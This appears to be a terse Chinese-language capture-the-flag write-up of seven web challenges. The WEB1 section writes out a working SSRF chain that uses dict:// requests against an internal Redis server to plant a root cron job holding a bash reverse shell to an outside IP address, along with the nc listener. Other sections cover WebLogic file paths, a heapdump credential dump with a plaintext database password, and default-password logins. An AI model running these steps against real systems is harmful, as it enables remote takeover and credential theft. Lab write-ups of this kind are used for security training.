WEB1
flag1
根目录的话,伪协议读取文件
file:///flag
flag2
同样存在
提示数据库中,还有内网范围172.18.240.0/24
没有给到具体的ip的话
返回页面单独测一下
应该是7
端口爆破一下
6379的redis
查看键值
获取值
dict://172.18.240.7:6379/GET flag
flag3
还是6379
反弹shell
写入计划任务
dict://172.18.240.7:6379/config set dir /var/spool/cron/
dict://172.18.240.7:6379/config set dbfilename root
dict://172.18.240.7:6379/SET x "\n\n* * * * * /bin/bash -c '/bin/bash -i >%26 /dev/tcp/118.178.135.162/8888 0>%261'\n\n"
nc -lvnp 8888dict://172.18.240.7:6379/SAVE
WEB2
flag1
7001weblogic
flag2
/uddiexplorer/oracle_logo.gif
./servers/AdminServer/tmp/_WL_internal/uddiexplorer/5f6ebw/war/oracle_logo.gif
. /root/Oracle/Middleware/user_projects/domains/base_domain
/root/Oracle/Middleware/user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/uddiexplorer/5f6ebw/war/
不能执行命令
在目录/root/Oracle/Middleware/user_projects/domains/base_domain/config/jdbc/JDBC_Data_Source-0-3407-jdbc.xml发现
WEB3
flag1
JDumpSpider-1.1-SNAPSHOT-full.jar使用(当然目录env之间也有flag1)
flag2
[password = MeetSec@2nd!2022, driverClassName = com.mysql.jdbc.Driver, url = jdbc:mysql://mysql_heapdump:13306/db, username = meetsec]
meetsec/MeetSec@2nd!2022
WEB4
cms
meetsec
2446d54c2e68d221db9cff65
WEB5
弱口令
WEB6
工具秒了
WEB7
默认密码,弱密码登录
JG/RsuIKp3DFaBfD3ctgeA==
